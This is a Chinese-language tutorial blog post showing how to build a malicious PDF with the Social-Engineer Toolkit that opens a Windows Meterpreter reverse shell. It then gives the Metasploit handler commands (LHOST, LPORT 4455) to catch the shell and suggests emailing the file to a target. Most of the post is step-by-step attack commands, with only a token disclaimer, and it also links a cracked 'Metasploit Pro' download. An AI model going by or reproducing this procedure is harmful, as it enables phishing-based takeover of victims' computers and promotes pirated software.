相关阅读
我们之前给您讲过通过发送一个视频远程控制一台计算机
data-postsbox="{"id":6961,"title":"黑客是如何通过发送一个视频来攻陷你的电脑?Metasploit入门","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3754,"comment_count":9,"category":"knowledge","is_forum_post":false}">{"id":6961,"title":"黑客是如何通过发送一个视频来攻陷你的电脑?Metasploit入门","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3754,"comment_count":9,"category":"knowledge","is_forum_post":false}
同时也讲到过反弹shell的原理
data-postsbox="{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}">{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}
甚至我们还拓展过通过word文档、excel文档打开完成钓鱼的神级操作
data-postsbox="{"id":6619,"title":"打开一个Office word文档/excel表也能被远控?由此引出的CS高级渗透、VBA语言学习","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3874,"comment_count":110,"category":"cybersecurity","is_forum_post":false}">{"id":6619,"title":"打开一个Office word文档/excel表也能被远控?由此引出的CS高级渗透、VBA语言学习","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3874,"comment_count":110,"category":"cybersecurity","is_forum_post":false}
预告
今天,我们给大家带来一期,通过发送一个pdf文件控制整台计算机的方法
视频讲解
准备工作
您可以通过Kali Linux中的Metasploit框架完成监听
data-postsbox="{"id":2210,"title":"Kali linux最新版 安装方法以及常见问题解答","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6747,"comment_count":28,"category":"cybersecurity","is_forum_post":false}">{"id":2210,"title":"Kali linux最新版 安装方法以及常见问题解答","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6747,"comment_count":28,"category":"cybersecurity","is_forum_post":false}
当然,你也可以使用你的windows电脑,安装2022年最新专业版Metasploit框架
data-postsbox="{"id":5955,"title":"Metasploit Pro 2022 最新专业激活版/破解版 价值15000$","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":18044,"comment_count":1115,"category":"software","is_forum_post":false}">{"id":5955,"title":"Metasploit Pro 2022 最新专业激活版/破解版 价值15000$","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":18044,"comment_count":1115,"category":"software","is_forum_post":false}
甚至,你还可以通过安卓手机(Termux)来安装Metasploit框架
data-postsbox="{"id":6225,"title":"Andriod手机如何使用终端下载任意网站的视频?玩转Termux","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3271,"comment_count":3,"category":"knowledge","is_forum_post":false}">{"id":6225,"title":"Andriod手机如何使用终端下载任意网站的视频?玩转Termux","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3271,"comment_count":3,"category":"knowledge","is_forum_post":false}
当然,苹果手机的ISH也可以安装Metasploit框架
docker run -d --name postgres postgres && docker start postgres
docker run -it --link postgres:db fcolista/alpine-metasploit
data-postsbox="{"id":6220,"title":"IOS手机如何使用终端下载任意网站的视频?玩转ISH SHELL","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":2745,"comment_count":5,"category":"knowledge","is_forum_post":false}">{"id":6220,"title":"IOS手机如何使用终端下载任意网站的视频?玩转ISH SHELL","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":2745,"comment_count":5,"category":"knowledge","is_forum_post":false}
图文教程
生成反弹shell的恶意pdf样本
我们这里以虚拟机中的Kali Linux为例
我们打开终端,使用管理员权限运行社会工程学工具setoolkit
sudo setoolkit
然后输入y同意条款(社会工程学工具请不要用于非法用途)
输入1,选择Social-Engineering Attacks(社会工程学攻击)
继续输入1,选择鱼叉式钓鱼攻击
输入2,Create a FileFormat Payload(创建一个文件格式的payload)
然后输入13,选择Adobe PDF Embedded EXE Social Engineering
接下来按需选择(选择1的话需要你自己提供一个原始的pdf文件,选择2则是空文件)
我们这里选择1
我们这里准备了一个pdf文件
放到了桌面/home/fancypig/桌面/fancypig.pdf 的位置
选择2,Windows Meterpreter Reverse_TCP
输入kali linux虚拟机的ip地址,我们这里是192.168.244.128
端口我们和视频里的保持一致,也写的4455
然后生成,我们输入2,输入一个酷酷的名字,我这里就用fancypig_bot.pdf
然后文件其实就已经生成了,接下来有2种选择,你可以直接拿文件用我们常用的邮箱投递,或者用gmail或者邮件服务器发送,如果是后者,请继续
如果你觉得太麻烦了,我们可以直接把文件拷出来,我们现在不清楚文件的位置,可以模糊搜索
我们知道刚才生成的文件名字是fancypig_bot.pdf ,因此直接在根目录搜索就行了
find / -name "fancypig_bot.pdf"
然后找到了位置,我们将文件复制到桌面
cp /root/.set/fancypig_bot.pdf /home/fancypig/桌面
可以看到外观上没有区别,但是里面已经混合了我们的恶意payload
监听并完成远控
我们现在使用Metasploit框架进行监听
sudo msfconsole
然后输入
use exploit/multi/handler
继续输入
set payload windows/meterpreter/reverse_tcp
然后查看选项
show options
然后设置好IP,这里填我们kali linux的IP地址
set LHOST 192.168.244.128
以及端口,我们刚才生成的恶意样本是4455端口,这里也要监听4455端口
set LPORT 4455
最后,运行
run
接下来我们需要等待,邮件投递过去,我们的目标使用windows电脑打开我们的pdf文件,然后我们就可以完整的进行远程控制了!
成功连上进行远程控制
常见的windows命令,比方说使用chrome浏览器打开猪头官网
start www.pigsec.cn
再比方说,创建并打开一个我们编辑好的记事本内容
echo 猪头正在看你的电脑,该好好修复一下漏洞了>C:\fancypig.txt
notepad.exe C:\fancypig.txt
当然,还有很多种有趣的玩法,大家可以借此机会好好学习一下windows的DOS命令。
我们在远程控制时,终端里输入的命令,其实就是用cmd执行的,也就是说你在本地可以通过cmd运行命令验证一下命令本身是否正确,能不能成功执行,顺带着学习一下DOS命令!